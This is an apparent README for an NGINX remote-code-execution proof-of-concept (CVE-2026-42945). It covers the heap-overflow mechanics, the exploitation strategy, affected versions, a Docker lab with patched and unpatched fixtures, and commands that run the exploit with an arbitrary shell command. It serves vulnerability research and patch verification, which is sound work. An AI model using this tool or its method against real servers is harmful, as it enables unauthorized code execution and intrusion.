Share
## https://sploitus.com/exploit?id=AF24E2C9-C4BC-5179-9E2E-AF21ECCFA255
# NGINX Rift โ CVE-2026-42945
RCE proof-of-concept for **CVE-2026-42945**, a critical heap buffer overflow in NGINX's `ngx_http_rewrite_module` introduced in 2008. Enables unauthenticated remote code execution against servers using `rewrite ... ?...` + `set` capture combinations.
Original vulnerability disclosure: [depthfirst](https://depthfirst.com/research/nginx-rift-achieving-nginx-rce-via-an-18-year-old-vulnerability) โ found alongside CVE-2026-42946, CVE-2026-40701, CVE-2026-42934 via their autonomous source-audit system.
## Layout
```
poc-CVE-2026-42945/
โโโ exploit.py โ improved PoC (3 modes: --check / --probe / --exploit)
โโโ poc.py.orig โ original depthfirst PoC (reference)
โโโ env/ โ dual-fixture Docker lab
โ โโโ Dockerfile (vuln: nginx commit 98fc3bb78)
โ โโโ Dockerfile.patched (patched: release-1.31.0)
โ โโโ docker-compose.yml (both services)
โ โโโ nginx.conf (vulnerable rewrite + set config)
โ โโโ entrypoint.sh (runs under setarch -R โ ASLR off)
โ โโโ server.py (backend stub)
โโโ discover-addresses.sh โ extract HEAP_BASE / LIBC_BASE / system() offset from running container
โโโ verify.sh โ dual-fixture reproducer (exploit vuln, prove patched blocks)
โโโ setup.sh โ build helper (legacy single-image)
โโโ references.md โ full bug mechanics, exploitation strategy, mitigations
โโโ README.md โ this file
```
## The Bug (TL;DR)
Two-pass script engine, `is_args` flag desync:
- **Length pass** sees `is_args = 0` โ allocates raw capture length
- **Copy pass** sees `is_args = 1` โ `ngx_escape_uri(NGX_ESCAPE_ARGS)` 3x expansion โ heap overflow
Exploitation: heap feng shui via POST `/spray` body (NUL bytes permitted in body, planted fake `ngx_pool_cleanup_s`) + URI overflow corrupting adjacent `ngx_pool_t.cleanup` head. Pool destruction โ `system(cmd)`.
Full mechanics + exploitation strategy in [references.md](references.md).
## Affected & Fixed
| Product | Affected | Fixed |
|-------------------|------------------|--------------------------|
| NGINX Open Source | 0.6.27 โ 1.30.0 | 1.30.1, 1.31.0 |
| NGINX Plus | R32 โ R36 | R36 P4, R35 P2, R32 P6 |
Vendor advisory:
## Quick Start
```bash
# Build both fixtures
docker compose -f env/docker-compose.yml build
# Start lab (vuln=:19321, patched=:19421)
docker compose -f env/docker-compose.yml up -d
# Detect-only (no overflow trigger)
python3 exploit.py --check --host 127.0.0.1 --port 19321
# Full exploit
python3 exploit.py --exploit --host 127.0.0.1 --port 19321 \
--cmd 'echo pwned > /tmp/rift'
docker exec nginx-rift-vuln cat /tmp/rift
# Dual-fixture verify (exploit vuln + confirm patched blocks)
./verify.sh
# Teardown
docker compose -f env/docker-compose.yml down
```
## Modes
| Mode | Use case | Side effect |
|---|---|---|
| `--check` | Detect rewrite surface presence | None โ sends small probe URIs only |
| `--probe` | Enumerate spray-landing offsets for THIS build | Crashes worker(s) during search; no exec |
| `--exploit` | Full RCE chain | Worker crash + `system()` call with `--cmd` |
Non-localhost targets require `--i-have-tested-this` flag (acknowledgment that hardcoded offsets match the deployed build).
## Address Discovery
Default `--heap-base` / `--libc-base` / `--system-offset` are the bundled lab's values (Ubuntu 22.04 / glibc 2.35 / nginx commit 98fc3bb78 / ASLR off). For a fresh build or different libc:
```bash
docker compose -f env/docker-compose.yml up -d nginx-vuln
./discover-addresses.sh
# Copy values into exploit.py invocation
```
## Caveats
- **Lab-only.** Hardcoded offsets are stable only inside the bundled fixture. Production exploitation requires per-target offset derivation (info leak + offset enumeration).
- **ASLR.** Lab disables ASLR via `setarch -R`. Real targets have ASLR enabled โ additional info-leak primitive required.
- **Config dependency.** Vulnerable surface requires `rewrite ... ?` + `set $X $N` combination in the deployed nginx.conf. Many real configs lack this.
## Credits
- Bug discovery + original PoC: [depthfirst](https://depthfirst.com)
- This fork: added `--check` detect mode, `--probe` offset enumeration, patched fixture, address-discovery helper, dual-fixture verifier